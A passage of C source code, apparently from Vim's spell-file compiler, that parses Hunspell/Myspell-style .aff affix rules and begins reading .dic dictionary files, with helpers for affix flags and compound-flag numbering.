smsg((char_u *)_("Wrong COMPOUNDMIN value in %s line %d: %s"),
fname, lnum, items[1]);
}
else if (is_aff_rule(items, itemcnt, "COMPOUNDSYLMAX", 2)
&& compsylmax == 0)
{
compsylmax = atoi((char *)items[1]);
if (compsylmax == 0)
smsg((char_u *)_("Wrong COMPOUNDSYLMAX value in %s line %d: %s"),
fname, lnum, items[1]);
}
else if (is_aff_rule(items, itemcnt, "CHECKCOMPOUNDDUP", 1))
{
compoptions |= COMP_CHECKDUP;
}
else if (is_aff_rule(items, itemcnt, "CHECKCOMPOUNDREP", 1))
{
compoptions |= COMP_CHECKREP;
}
else if (is_aff_rule(items, itemcnt, "CHECKCOMPOUNDCASE", 1))
{
compoptions |= COMP_CHECKCASE;
}
else if (is_aff_rule(items, itemcnt, "CHECKCOMPOUNDTRIPLE", 1))
{
compoptions |= COMP_CHECKTRIPLE;
}
else if (is_aff_rule(items, itemcnt, "CHECKCOMPOUNDPATTERN", 2))
{
if (atoi((char *)items[1]) == 0)
smsg((char_u *)_("Wrong CHECKCOMPOUNDPATTERN value in %s line %d: %s"),
fname, lnum, items[1]);
}
else if (is_aff_rule(items, itemcnt, "CHECKCOMPOUNDPATTERN", 3))
{
garray_T *gap = &spin->si_comppat;
int i;
/* Only add the couple if it isn't already there. */
for (i = 0; i < gap->ga_len - 1; i += 2)
if (STRCMP(((char_u **)(gap->ga_data))[i], items[1]) == 0
&& STRCMP(((char_u **)(gap->ga_data))[i + 1],
items[2]) == 0)
break;
if (i >= gap->ga_len && ga_grow(gap, 2) == OK)
{
((char_u **)(gap->ga_data))[gap->ga_len++]
= getroom_save(spin, items[1]);
((char_u **)(gap->ga_data))[gap->ga_len++]
= getroom_save(spin, items[2]);
}
}
else if (is_aff_rule(items, itemcnt, "SYLLABLE", 2)
&& syllable == NULL)
{
syllable = getroom_save(spin, items[1]);
}
else if (is_aff_rule(items, itemcnt, "NOBREAK", 1))
{
spin->si_nobreak = TRUE;
}
else if (is_aff_rule(items, itemcnt, "NOSPLITSUGS", 1))
{
spin->si_nosplitsugs = TRUE;
}
else if (is_aff_rule(items, itemcnt, "NOCOMPOUNDSUGS", 1))
{
spin->si_nocompoundsugs = TRUE;
}
else if (is_aff_rule(items, itemcnt, "NOSUGFILE", 1))
{
spin->si_nosugfile = TRUE;
}
else if (is_aff_rule(items, itemcnt, "PFXPOSTPONE", 1))
{
aff->af_pfxpostpone = TRUE;
}
else if (is_aff_rule(items, itemcnt, "IGNOREEXTRA", 1))
{
aff->af_ignoreextra = TRUE;
}
else if ((STRCMP(items[0], "PFX") == 0
|| STRCMP(items[0], "SFX") == 0)
&& aff_todo == 0
&& itemcnt >= 4)
{
int lasti = 4;
char_u key[AH_KEY_LEN];
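/* This is the start of an affix block: "PFX/SFX {flag} {Y/N} {count}",
* where {Y/N} says whether the affix may combine with the other kind of
* affix and {count} is the number of entry lines that follow. */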
if (*items[0] == 'P')
tp = &aff->af_pref;
else
tp = &aff->af_suff;
/* Myspell allows the same affix name to be used multiple
* times. The affix files that do this have an undocumented
* "S" flag on all but the last block, thus we check for that
* and store it in ah_follows. */
vim_strncpy(key, items[1], AH_KEY_LEN - 1);
hi = hash_find(tp, key);
if (!HASHITEM_EMPTY(hi))
{
cur_aff = HI2AH(hi);
if (cur_aff->ah_combine != (*items[2] == 'Y'))
smsg((char_u *)_("Different combining flag in continued affix block in %s line %d: %s"),
fname, lnum, items[1]);
if (!cur_aff->ah_follows)
smsg((char_u *)_("Duplicate affix in %s line %d: %s"),
fname, lnum, items[1]);
}
else
{
/* New affix letter. */
cur_aff = (affheader_T *)getroom(spin,
sizeof(affheader_T), TRUE);
if (cur_aff == NULL)
break;
cur_aff->ah_flag = affitem2flag(aff->af_flagtype, items[1],
fname, lnum);
if (cur_aff->ah_flag == 0 || STRLEN(items[1]) >= AH_KEY_LEN)
break;
if (cur_aff->ah_flag == aff->af_bad
|| cur_aff->ah_flag == aff->af_rare
|| cur_aff->ah_flag == aff->af_keepcase
|| cur_aff->ah_flag == aff->af_needaffix
|| cur_aff->ah_flag == aff->af_circumfix
|| cur_aff->ah_flag == aff->af_nosuggest
|| cur_aff->ah_flag == aff->af_needcomp
|| cur_aff->ah_flag == aff->af_comproot)
smsg((char_u *)_("Affix also used for BAD/RARE/KEEPCASE/NEEDAFFIX/NEEDCOMPOUND/NOSUGGEST in %s line %d: %s"),
fname, lnum, items[1]);
STRCPY(cur_aff->ah_key, items[1]);
hash_add(tp, cur_aff->ah_key);
cur_aff->ah_combine = (*items[2] == 'Y');
}
/* Check for the "S" flag, which apparently means that another
* block with the same affix name is following. */
if (itemcnt > lasti && STRCMP(items[lasti], "S") == 0)
{
++lasti;
cur_aff->ah_follows = TRUE;
}
else
cur_aff->ah_follows = FALSE;
/* Myspell allows extra text after the item, but that might
* mean mistakes go unnoticed. Require a comment-starter. */
if (itemcnt > lasti && *items[lasti] != '#')
smsg((char_u *)_(e_afftrailing), fname, lnum, items[lasti]);
if (STRCMP(items[2], "Y") != 0 && STRCMP(items[2], "N") != 0)
smsg((char_u *)_("Expected Y or N in %s line %d: %s"),
fname, lnum, items[2]);
if (*items[0] == 'P' && aff->af_pfxpostpone)
{
if (cur_aff->ah_newID == 0)
{
/* Use a new number in the .spl file later, to be able
* to handle multiple .aff files. */
check_renumber(spin);
cur_aff->ah_newID = ++spin->si_newprefID;
/* We only really use ah_newID if the prefix is
* postponed. We know that only after handling all
* the items. */
did_postpone_prefix = FALSE;
}
else
/* Did use the ID in a previous block. */
did_postpone_prefix = TRUE;
}
aff_todo = atoi((char *)items[3]);
}
else if ((STRCMP(items[0], "PFX") == 0
|| STRCMP(items[0], "SFX") == 0)
&& aff_todo > 0
&& STRCMP(cur_aff->ah_key, items[1]) == 0
&& itemcnt >= 5)
{
affentry_T *aff_entry;
int upper = FALSE;
int lasti = 5;
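/* This is one entry of an affix block:
* "PFX/SFX {flag} {chop} {add}[/flags] {condition}", where "0" means an
* empty chop or add string and "." means no condition. */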
/* Myspell allows extra text after the item, but that might
* mean mistakes go unnoticed. Require a comment-starter,
* unless IGNOREEXTRA is used. Hunspell uses a "-" item. */
if (itemcnt > lasti
&& !aff->af_ignoreextra
&& *items[lasti] != '#'
&& (STRCMP(items[lasti], "-") != 0
|| itemcnt != lasti + 1))
smsg((char_u *)_(e_afftrailing), fname, lnum, items[lasti]);
/* New item for an affix letter. */
--aff_todo;
aff_entry = (affentry_T *)getroom(spin,
sizeof(affentry_T), TRUE);
if (aff_entry == NULL)
break;
if (STRCMP(items[2], "0") != 0)
aff_entry->ae_chop = getroom_save(spin, items[2]);
if (STRCMP(items[3], "0") != 0)
{
aff_entry->ae_add = getroom_save(spin, items[3]);
/* Recognize flags on the affix: abcd/XYZ */
aff_entry->ae_flags = vim_strchr(aff_entry->ae_add, '/');
if (aff_entry->ae_flags != NULL)
{
*aff_entry->ae_flags++ = NUL;
aff_process_flags(aff, aff_entry);
}
}
/* Don't use an affix entry with non-ASCII characters when
* "spin->si_ascii" is TRUE. */
if (!spin->si_ascii || !(has_non_ascii(aff_entry->ae_chop)
|| has_non_ascii(aff_entry->ae_add)))
{
aff_entry->ae_next = cur_aff->ah_first;
cur_aff->ah_first = aff_entry;
if (STRCMP(items[4], ".") != 0)
{
char_u buf[MAXLINELEN];
aff_entry->ae_cond = getroom_save(spin, items[4]);
if (*items[0] == 'P')
sprintf((char *)buf, "^%s", items[4]);
else
sprintf((char *)buf, "%s$", items[4]);
aff_entry->ae_prog = vim_regcomp(buf,
RE_MAGIC + RE_STRING + RE_STRICT);
if (aff_entry->ae_prog == NULL)
smsg((char_u *)_("Broken condition in %s line %d: %s"),
fname, lnum, items[4]);
}
/* For postponed prefixes we need an entry in si_prefcond
* for the condition. Use an existing one if possible.
* Can't be done for an affix with flags, ignoring
* COMPOUNDFORBIDFLAG and COMPOUNDPERMITFLAG. */
if (*items[0] == 'P' && aff->af_pfxpostpone
&& aff_entry->ae_flags == NULL)
{
/* When the chop string is one lower-case letter and
* the add string ends in the upper-case letter we set
* the "upper" flag, clear "ae_chop" and remove the
* letters from "ae_add". The condition must either
* be empty or start with the same letter. */
if (aff_entry->ae_chop != NULL
&& aff_entry->ae_add != NULL
#ifdef FEAT_MBYTE
&& aff_entry->ae_chop[(*mb_ptr2len)(
aff_entry->ae_chop)] == NUL
#else
&& aff_entry->ae_chop[1] == NUL
#endif
)
{
int c, c_up;
c = PTR2CHAR(aff_entry->ae_chop);
c_up = SPELL_TOUPPER(c);
if (c_up != c
&& (aff_entry->ae_cond == NULL
|| PTR2CHAR(aff_entry->ae_cond) == c))
{
p = aff_entry->ae_add
+ STRLEN(aff_entry->ae_add);
mb_ptr_back(aff_entry->ae_add, p);
if (PTR2CHAR(p) == c_up)
{
upper = TRUE;
aff_entry->ae_chop = NULL;
*p = NUL;
/* The condition is matched with the
* actual word, thus must check for the
* upper-case letter. */
if (aff_entry->ae_cond != NULL)
{
char_u buf[MAXLINELEN];
#ifdef FEAT_MBYTE
if (has_mbyte)
{
onecap_copy(items[4], buf, TRUE);
aff_entry->ae_cond = getroom_save(
spin, buf);
}
else
#endif
*aff_entry->ae_cond = c_up;
if (aff_entry->ae_cond != NULL)
{
sprintf((char *)buf, "^%s",
aff_entry->ae_cond);
vim_regfree(aff_entry->ae_prog);
aff_entry->ae_prog = vim_regcomp(
buf, RE_MAGIC + RE_STRING);
}
}
}
}
}
if (aff_entry->ae_chop == NULL
&& aff_entry->ae_flags == NULL)
{
int idx;
char_u **pp;
int n;
/* Find a previously used condition. */
for (idx = spin->si_prefcond.ga_len - 1; idx >= 0;
--idx)
{
p = ((char_u **)spin->si_prefcond.ga_data)[idx];
if (str_equal(p, aff_entry->ae_cond))
break;
}
if (idx < 0 && ga_grow(&spin->si_prefcond, 1) == OK)
{
/* Not found, add a new condition. */
idx = spin->si_prefcond.ga_len++;
pp = ((char_u **)spin->si_prefcond.ga_data)
+ idx;
if (aff_entry->ae_cond == NULL)
*pp = NULL;
else
*pp = getroom_save(spin,
aff_entry->ae_cond);
}
/* Add the prefix to the prefix tree. */
if (aff_entry->ae_add == NULL)
p = (char_u *)"";
else
p = aff_entry->ae_add;
/* PFX_FLAGS is a negative number, so that
* tree_add_word() knows this is the prefix tree. */
n = PFX_FLAGS;
if (!cur_aff->ah_combine)
n |= WFP_NC;
if (upper)
n |= WFP_UP;
if (aff_entry->ae_comppermit)
n |= WFP_COMPPERMIT;
if (aff_entry->ae_compforbid)
n |= WFP_COMPFORBID;
tree_add_word(spin, p, spin->si_prefroot, n,
idx, cur_aff->ah_newID);
did_postpone_prefix = TRUE;
}
/* Didn't actually use ah_newID, backup si_newprefID. */
if (aff_todo == 0 && !did_postpone_prefix)
{
--spin->si_newprefID;
cur_aff->ah_newID = 0;
}
}
}
}
else if (is_aff_rule(items, itemcnt, "FOL", 2) && fol == NULL)
{
fol = vim_strsave(items[1]);
}
else if (is_aff_rule(items, itemcnt, "LOW", 2) && low == NULL)
{
low = vim_strsave(items[1]);
}
else if (is_aff_rule(items, itemcnt, "UPP", 2) && upp == NULL)
{
upp = vim_strsave(items[1]);
}
else if (is_aff_rule(items, itemcnt, "REP", 2)
|| is_aff_rule(items, itemcnt, "REPSAL", 2))
{
/* Ignore the REP/REPSAL count, but check that it is a number. */
if (!isdigit(*items[1]))
smsg((char_u *)_("Expected REP(SAL) count in %s line %d"),
fname, lnum);
}
else if ((STRCMP(items[0], "REP") == 0
|| STRCMP(items[0], "REPSAL") == 0)
&& itemcnt >= 3)
{
/* REP/REPSAL item */
/* Myspell ignores extra arguments; we require that any extra text starts
* with # to detect mistakes. */
if (itemcnt > 3 && items[3][0] != '#')
smsg((char_u *)_(e_afftrailing), fname, lnum, items[3]);
if (items[0][3] == 'S' ? do_repsal : do_rep)
{
/* Replace underscore with space (can't include a space
* directly). */
for (p = items[1]; *p != NUL; mb_ptr_adv(p))
if (*p == '_')
*p = ' ';
for (p = items[2]; *p != NUL; mb_ptr_adv(p))
if (*p == '_')
*p = ' ';
add_fromto(spin, items[0][3] == 'S'
? &spin->si_repsal
: &spin->si_rep, items[1], items[2]);
}
}
else if (is_aff_rule(items, itemcnt, "MAP", 2))
{
/* MAP item or count */
if (!found_map)
{
/* First line contains the count. */
found_map = TRUE;
if (!isdigit(*items[1]))
smsg((char_u *)_("Expected MAP count in %s line %d"),
fname, lnum);
}
else if (do_mapline)
{
int c;
/* Check that every character appears only once. */
for (p = items[1]; *p != NUL; )
{
#ifdef FEAT_MBYTE
c = mb_ptr2char_adv(&p);
#else
c = *p++;
#endif
if ((spin->si_map.ga_len > 0
&& vim_strchr(spin->si_map.ga_data, c)
!= NULL)
|| vim_strchr(p, c) != NULL)
smsg((char_u *)_("Duplicate character in MAP in %s line %d"),
fname, lnum);
}
/* We simply concatenate all the MAP strings, separated by
* slashes. */
ga_concat(&spin->si_map, items[1]);
ga_append(&spin->si_map, '/');
}
}
/* Accept "SAL from to" and "SAL from to #comment". */
else if (is_aff_rule(items, itemcnt, "SAL", 3))
{
if (do_sal)
{
/* SAL item (sounds-a-like)
* Either one of the known keys or a from-to pair. */
if (STRCMP(items[1], "followup") == 0)
spin->si_followup = sal_to_bool(items[2]);
else if (STRCMP(items[1], "collapse_result") == 0)
spin->si_collapse = sal_to_bool(items[2]);
else if (STRCMP(items[1], "remove_accents") == 0)
spin->si_rem_accents = sal_to_bool(items[2]);
else
/* when "to" is "_" it means empty */
add_fromto(spin, &spin->si_sal, items[1],
STRCMP(items[2], "_") == 0 ? (char_u *)""
: items[2]);
}
}
else if (is_aff_rule(items, itemcnt, "SOFOFROM", 2)
&& sofofrom == NULL)
{
sofofrom = getroom_save(spin, items[1]);
}
else if (is_aff_rule(items, itemcnt, "SOFOTO", 2)
&& sofoto == NULL)
{
sofoto = getroom_save(spin, items[1]);
}
else if (STRCMP(items[0], "COMMON") == 0)
{
int i;
for (i = 1; i < itemcnt; ++i)
{
if (HASHITEM_EMPTY(hash_find(&spin->si_commonwords,
items[i])))
{
p = vim_strsave(items[i]);
if (p == NULL)
break;
hash_add(&spin->si_commonwords, p);
}
}
}
else
smsg((char_u *)_("Unrecognized or duplicate item in %s line %d: %s"),
fname, lnum, items[0]);
}
}
if (fol != NULL || low != NULL || upp != NULL)
{
if (spin->si_clear_chartab)
{
/* Clear the char type tables, don't want to use any of the
* currently used spell properties. */
init_spell_chartab();
spin->si_clear_chartab = FALSE;
}
/*
* Don't write a word table for an ASCII file, so that we don't check
* for conflicts with a word table that matches 'encoding'.
* Don't write one for utf-8 either, we use utf_*() and
* mb_get_class(), the list of chars in the file will be incomplete.
*/
if (!spin->si_ascii
#ifdef FEAT_MBYTE
&& !enc_utf8
#endif
)
{
if (fol == NULL || low == NULL || upp == NULL)
smsg((char_u *)_("Missing FOL/LOW/UPP line in %s"), fname);
else
(void)set_spell_chartab(fol, low, upp);
}
vim_free(fol);
vim_free(low);
vim_free(upp);
}
/* Use compound specifications of the .aff file for the spell info. */
if (compmax != 0)
{
aff_check_number(spin->si_compmax, compmax, "COMPOUNDWORDMAX");
spin->si_compmax = compmax;
}
if (compminlen != 0)
{
aff_check_number(spin->si_compminlen, compminlen, "COMPOUNDMIN");
spin->si_compminlen = compminlen;
}
if (compsylmax != 0)
{
if (syllable == NULL)
smsg((char_u *)_("COMPOUNDSYLMAX used without SYLLABLE"));
aff_check_number(spin->si_compsylmax, compsylmax, "COMPOUNDSYLMAX");
spin->si_compsylmax = compsylmax;
}
if (compoptions != 0)
{
aff_check_number(spin->si_compoptions, compoptions, "COMPOUND options");
spin->si_compoptions |= compoptions;
}
if (compflags != NULL)
process_compflags(spin, aff, compflags);
/* Check that we didn't use too many renumbered flags. */
if (spin->si_newcompID < spin->si_newprefID)
{
if (spin->si_newcompID == 127 || spin->si_newcompID == 255)
MSG(_("Too many postponed prefixes"));
else if (spin->si_newprefID == 0 || spin->si_newprefID == 127)
MSG(_("Too many compound flags"));
else
MSG(_("Too many postponed prefixes and/or compound flags"));
}
if (syllable != NULL)
{
aff_check_string(spin->si_syllable, syllable, "SYLLABLE");
spin->si_syllable = syllable;
}
if (sofofrom != NULL || sofoto != NULL)
{
if (sofofrom == NULL || sofoto == NULL)
smsg((char_u *)_("Missing SOFO%s line in %s"),
sofofrom == NULL ? "FROM" : "TO", fname);
else if (spin->si_sal.ga_len > 0)
smsg((char_u *)_("Both SAL and SOFO lines in %s"), fname);
else
{
aff_check_string(spin->si_sofofr, sofofrom, "SOFOFROM");
aff_check_string(spin->si_sofoto, sofoto, "SOFOTO");
spin->si_sofofr = sofofrom;
spin->si_sofoto = sofoto;
}
}
if (midword != NULL)
{
aff_check_string(spin->si_midword, midword, "MIDWORD");
spin->si_midword = midword;
}
vim_free(pc);
fclose(fd);
return aff;
}
/*
* Return TRUE when "items[0]" equals "rulename" and there are "mincount"
* items, or more items when item "mincount" starts a comment.
*/
static int
is_aff_rule(
char_u **items,
int itemcnt,
char *rulename,
int mincount)
{
return (STRCMP(items[0], rulename) == 0
&& (itemcnt == mincount
|| (itemcnt > mincount && items[mincount][0] == '#')));
}
/*
* For affix "entry" move COMPOUNDFORBIDFLAG and COMPOUNDPERMITFLAG from
* ae_flags to ae_comppermit and ae_compforbid.
*/
static void
aff_process_flags(afffile_T *affile, affentry_T *entry)
{
char_u *p;
char_u *prevp;
unsigned flag;
if (entry->ae_flags != NULL
&& (affile->af_compforbid != 0 || affile->af_comppermit != 0))
{
for (p = entry->ae_flags; *p != NUL; )
{
prevp = p;
flag = get_affitem(affile->af_flagtype, &p);
if (flag == affile->af_comppermit || flag == affile->af_compforbid)
{
STRMOVE(prevp, p);
p = prevp;
if (flag == affile->af_comppermit)
entry->ae_comppermit = TRUE;
else
entry->ae_compforbid = TRUE;
}
if (affile->af_flagtype == AFT_NUM && *p == ',')
++p;
}
if (*entry->ae_flags == NUL)
entry->ae_flags = NULL; /* nothing left */
}
}
/*
* Return TRUE if "s" is the name of an info item in the affix file.
*/
static int
spell_info_item(char_u *s)
{
return STRCMP(s, "NAME") == 0
|| STRCMP(s, "HOME") == 0
|| STRCMP(s, "VERSION") == 0
|| STRCMP(s, "AUTHOR") == 0
|| STRCMP(s, "EMAIL") == 0
|| STRCMP(s, "COPYRIGHT") == 0;
}
/*
* Turn an affix flag name into a number, according to the FLAG type.
* Returns zero for failure.
*/
static unsigned
affitem2flag(
int flagtype,
char_u *item,
char_u *fname,
int lnum)
{
unsigned res;
char_u *p = item;
res = get_affitem(flagtype, &p);
if (res == 0)
{
if (flagtype == AFT_NUM)
smsg((char_u *)_("Flag is not a number in %s line %d: %s"),
fname, lnum, item);
else
smsg((char_u *)_("Illegal flag in %s line %d: %s"),
fname, lnum, item);
}
if (*p != NUL)
{
smsg((char_u *)_(e_affname), fname, lnum, item);
return 0;
}
return res;
}
/*
* Get one affix name from "*pp" and advance the pointer.
* Returns zero for an error; the pointer is still advanced in that case.
*/
static unsigned
get_affitem(int flagtype, char_u **pp)
{
int res;
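/* For AFT_LONG (and AFT_CAPLONG when the first char is upper-case) a flag
* consists of two characters; they are packed into one number with the
* first character in the upper 16 bits. */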
if (flagtype == AFT_NUM)
{
if (!VIM_ISDIGIT(**pp))
{
++*pp; /* always advance, avoid getting stuck */
return 0;
}
res = getdigits(pp);
}
else
{
#ifdef FEAT_MBYTE
res = mb_ptr2char_adv(pp);
#else
res = *(*pp)++;
#endif
if (flagtype == AFT_LONG || (flagtype == AFT_CAPLONG
&& res >= 'A' && res <= 'Z'))
{
if (**pp == NUL)
return 0;
#ifdef FEAT_MBYTE
res = mb_ptr2char_adv(pp) + (res << 16);
#else
res = *(*pp)++ + (res << 16);
#endif
}
}
return res;
}
/*
* Process the "compflags" string used in an affix file and append it to
* spin->si_compflags.
* The processing involves changing the affix names to ID numbers, so that
* they fit in one byte.
*/
static void
process_compflags(
spellinfo_T *spin,
afffile_T *aff,
char_u *compflags)
{
char_u *p;
char_u *prevp;
unsigned flag;
compitem_T *ci;
int id;
int len;
char_u *tp;
char_u key[AH_KEY_LEN];
hashitem_T *hi;
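/* The rule characters "/?*+[]" are copied as-is; every other item is an
* affix flag that gets replaced by its one-byte compound ID, so e.g. a
* two-character or numeric flag ends up as a single byte. */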
/* Make room for the old and the new compflags, concatenated with a / in
* between. Processing it makes it shorter, but we don't know by how
* much, thus allocate the maximum. */
len = (int)STRLEN(compflags) + 1;
if (spin->si_compflags != NULL)
len += (int)STRLEN(spin->si_compflags) + 1;
p = getroom(spin, len, FALSE);
if (p == NULL)
return;
if (spin->si_compflags != NULL)
{
STRCPY(p, spin->si_compflags);
STRCAT(p, "/");
}
spin->si_compflags = p;
tp = p + STRLEN(p);
for (p = compflags; *p != NUL; )
{
if (vim_strchr((char_u *)"/?*+[]", *p) != NULL)
/* Copy non-flag characters directly. */
*tp++ = *p++;
else
{
/* First get the flag number, also checks validity. */
prevp = p;
flag = get_affitem(aff->af_flagtype, &p);
if (flag != 0)
{
/* Find the flag in the hashtable. If it was used before, use
* the existing ID. Otherwise add a new entry. */
vim_strncpy(key, prevp, p - prevp);
hi = hash_find(&aff->af_comp, key);
if (!HASHITEM_EMPTY(hi))
id = HI2CI(hi)->ci_newID;
else
{
ci = (compitem_T *)getroom(spin, sizeof(compitem_T), TRUE);
if (ci == NULL)
break;
STRCPY(ci->ci_key, key);
ci->ci_flag = flag;
/* Avoid using a flag ID that has a special meaning in a
* regexp (also inside []). */
do
{
check_renumber(spin);
id = spin->si_newcompID--;
} while (vim_strchr((char_u *)"/?*+[]\\-^", id) != NULL);
ci->ci_newID = id;
hash_add(&aff->af_comp, ci->ci_key);
}
*tp++ = id;
}
if (aff->af_flagtype == AFT_NUM && *p == ',')
++p;
}
}
*tp = NUL;
}
/*
* Check that the new IDs for postponed affixes and compounding don't overrun
* each other. We have almost 255 IDs available, but start with 0-127 to
* avoid using two bytes for UTF-8. When the 0-127 range is used up go to
* 128-255. When that is also used up an error message is given.
*/
static void
check_renumber(spellinfo_T *spin)
{
if (spin->si_newprefID == spin->si_newcompID && spin->si_newcompID < 128)
{
spin->si_newprefID = 127;
spin->si_newcompID = 255;
}
}
/*
* Return TRUE if flag "flag" appears in affix list "afflist".
*/
static int
flag_in_afflist(int flagtype, char_u *afflist, unsigned flag)
{
char_u *p;
unsigned n;
switch (flagtype)
{
case AFT_CHAR:
return vim_strchr(afflist, flag) != NULL;
case AFT_CAPLONG:
case AFT_LONG:
for (p = afflist; *p != NUL; )
{
#ifdef FEAT_MBYTE
n = mb_ptr2char_adv(&p);
#else
n = *p++;
#endif
if ((flagtype == AFT_LONG || (n >= 'A' && n <= 'Z'))
&& *p != NUL)
#ifdef FEAT_MBYTE
n = mb_ptr2char_adv(&p) + (n << 16);
#else
n = *p++ + (n << 16);
#endif
if (n == flag)
return TRUE;
}
break;
case AFT_NUM:
for (p = afflist; *p != NUL; )
{
n = getdigits(&p);
if (n == flag)
return TRUE;
if (*p != NUL) /* skip over comma */
++p;
}
break;
}
return FALSE;
}
/*
* Give a warning when "spinval" and "affval" numbers are set and not the same.
*/
static void
aff_check_number(int spinval, int affval, char *name)
{
if (spinval != 0 && spinval != affval)
smsg((char_u *)_("%s value differs from what is used in another .aff file"), name);
}
/*
* Give a warning when "spinval" and "affval" strings are set and not the same.
*/
static void
aff_check_string(char_u *spinval, char_u *affval, char *name)
{
if (spinval != NULL && STRCMP(spinval, affval) != 0)
smsg((char_u *)_("%s value differs from what is used in another .aff file"), name);
}
/*
* Return TRUE if strings "s1" and "s2" are equal. Also consider both being
* NULL as equal.
*/
static int
str_equal(char_u *s1, char_u *s2)
{
if (s1 == NULL || s2 == NULL)
return s1 == s2;
return STRCMP(s1, s2) == 0;
}
/*
* Add a from-to item to "gap". Used for REP and SAL items.
* They are stored case-folded.
*/
static void
add_fromto(
spellinfo_T *spin,
garray_T *gap,
char_u *from,
char_u *to)
{
fromto_T *ftp;
char_u word[MAXWLEN];
if (ga_grow(gap, 1) == OK)
{
ftp = ((fromto_T *)gap->ga_data) + gap->ga_len;
(void)spell_casefold(from, (int)STRLEN(from), word, MAXWLEN);
ftp->ft_from = getroom_save(spin, word);
(void)spell_casefold(to, (int)STRLEN(to), word, MAXWLEN);
ftp->ft_to = getroom_save(spin, word);
++gap->ga_len;
}
}
/*
* Convert a boolean argument in a SAL line to TRUE or FALSE.
*/
static int
sal_to_bool(char_u *s)
{
return STRCMP(s, "1") == 0 || STRCMP(s, "true") == 0;
}
/*
* Free the structure filled by spell_read_aff().
*/
static void
spell_free_aff(afffile_T *aff)
{
hashtab_T *ht;
hashitem_T *hi;
int todo;
affheader_T *ah;
affentry_T *ae;
vim_free(aff->af_enc);
/* All this trouble to free the "ae_prog" items... */
for (ht = &aff->af_pref; ; ht = &aff->af_suff)
{
todo = (int)ht->ht_used;
for (hi = ht->ht_array; todo > 0; ++hi)
{
if (!HASHITEM_EMPTY(hi))
{
--todo;
ah = HI2AH(hi);
for (ae = ah->ah_first; ae != NULL; ae = ae->ae_next)
vim_regfree(ae->ae_prog);
}
}
if (ht == &aff->af_suff)
break;
}
hash_clear(&aff->af_pref);
hash_clear(&aff->af_suff);
hash_clear(&aff->af_comp);
}
/*
* Read dictionary file "fname".
* Returns OK or FAIL.
*/
static int
spell_read_dic(spellinfo_T *spin, char_u *fname, afffile_T *affile)
{
hashtab_T ht;
char_u line[MAXLINELEN];
char_u *p;
char_u *afflist;
char_u store_afflist[MAXWLEN];
int pfxlen;
int need_affix;
char_u *dw;
char_u *pc;
char_u *w;
int l;
hash_T hash;
hashitem_T *hi;
FILE *fd;
int lnum = 1;
int non_ascii = 0;
int retval = OK;
char_u message[MAXLINELEN + MAXWLEN];
int flags;
int duplicate = 0;
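/* A .dic file starts with a line holding the word count, followed by one
* word per line, optionally with an affix flag list after a slash:
* "word/ABC". */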
/*
* Open the file.
*/
fd = mch_fopen((char *)fname, "r");
if (fd == NULL)
{
EMSG2(_(e_notopen), fname);
return FAIL;
}
/* The hashtable is only used to detect duplicated words. */
hash_init(&ht);
vim_snprintf((char *)IObuff, IOSIZE,
_("Reading dictionary file %s ..."), fname);
spell_message(spin, IObuff);
/* start with a message for the first line */
spin->si_msg_count = 999999;
/* Read and ignore the first line: word count. */
(void)vim_fgets(line, MAXLINELEN, fd);
if (!vim_isdigit(*skipwhite(line)))
EMSG2(_("E760: No word count in %s"), fname);
/*
* Read all the lines in the file one by one.
* The words are converted to 'encoding' here, before being added to
* the hashtable.
*/
while (!vim_fgets(line, MAXLINELEN, fd) && !got_int)
{
line_breakcheck();
++lnum;
if (line[0] == '#' || line[0] == '/')
continue; /* comment line */
/* Remove CR, LF and white space from the end. White space in the middle
* of the word is kept to allow e.g., "et al.". */
l = (int)STRLEN(line);
while (l > 0 && line[l - 1] <= ' ')
--l;
if (l == 0)
continue; /* empty line */
line[l] = NUL;
#ifdef FEAT_MBYTE
/* Convert from "SET" to 'encoding' when needed. */
if (spin->si_conv.vc_type != CONV_NONE)
{
pc = string_convert(&spin->si_conv, line, NULL);
if (pc == NULL)
{
smsg((char_u *)_("Conversion failure for word in %s line %d: %s"),
fname, lnum, line);
continue;
}
w = pc;
}
else
#endif
{
pc = NULL;
w = line;
}
/* Truncate the word at the "/", set "afflist" to what follows.
* Replace "\/" by "/" and "\\" by "\". */
afflist = NULL;
for (p = w; *p != NUL; mb_ptr_adv(p))
{
if (*p == '\\' && (p[1] == '\\' || p[1] == '/'))
STRMOVE(p, p + 1);
else if (*p == '/')
{
*p = NUL;
afflist = p + 1;
break;
}
}
/* Skip non-ASCII words when "spin->si_ascii" is TRUE. */
if (spin->si_ascii && has_non_ascii(w))
{
++non_ascii;
vim_free(pc);
continue;
}
/* This takes time, print a message every 10000 words. */
if (spin->si_verbose && spin->si_msg_count > 10000)
{
spin->si_msg_count = 0;
vim_snprintf((char *)message, sizeof(message),
_("line %6d, word %6d - %s"),
lnum, spin->si_foldwcount + spin->si_keepwcount, w);
msg_start();
msg_puts_long_attr(message, 0);
msg_clr_eos();
msg_didout = FALSE;
msg_col = 0;
out_flush();
}
/* Store the word in the hashtable to be able to find duplicates. */
dw = (char_u *)getroom_save(spin, w);
if (dw == NULL)
{
retval = FAIL;
vim_free(pc);
break;
}
hash = hash_hash(dw);
hi = hash_lookup(&ht, dw, hash);
if (!HASHITEM_EMPTY(hi))
{
if (p_verbose > 0)
smsg((char_u *)_("Duplicate word in %s line %d: %s"),
fname, lnum, dw);
else if (duplicate == 0)
smsg((char_u *)_("First duplicate word in %s line %d: %s"),
fname, lnum, dw);
++duplicate;
}
else
hash_add_item(&ht, hi, dw, hash);
flags = 0;
store_afflist[0] = NUL;
pfxlen = 0;
need_affix = FALSE;
if (afflist != NULL)
{
/* Extract flags from the affix list. */
flags |= get_affix_flags(affile, afflist);
if (affile->af_needaffix != 0 && flag_in_afflist(
affile->af_flagtype, afflist, affile->af_needaffix))
need_affix = TRUE;
if (affile->af_pfxpostpone)
/* Need to store the list of prefix IDs with the word. */
pfxlen = get_pfxlist(affile, afflist, store_afflist);
if (spin->si_compflags != NULL)
/* Need to store the list of compound flags with the word.
* Concatenate them to the list of prefix IDs. */
get_compflags(affile, afflist, store_afflist + pfxlen);
}
/* Add the word to the word tree(s). */
if (store_word(spin, dw, flags, spin->si_region,
store_afflist, need_affix) == FAIL)
retval = FAIL;
if (afflist != NULL)
{
/* Find all matching suffixes and add the resulting words.
* Additionally do matching prefixes that combine. */
if (store_aff_word(spin, dw, afflist, affile,
&affile->af_suff, &affile->af_pref,
CONDIT_SUF, flags, store_afflist, pfxlen) == FAIL)
retval = FAIL;
/* Find all matching prefixes and add the resulting words. */
if (store_aff_word(spin, dw, afflist, affile,
&affile->af_pref, NULL,
CONDIT_SUF, flags, store_afflist, pfxlen) == FAIL)
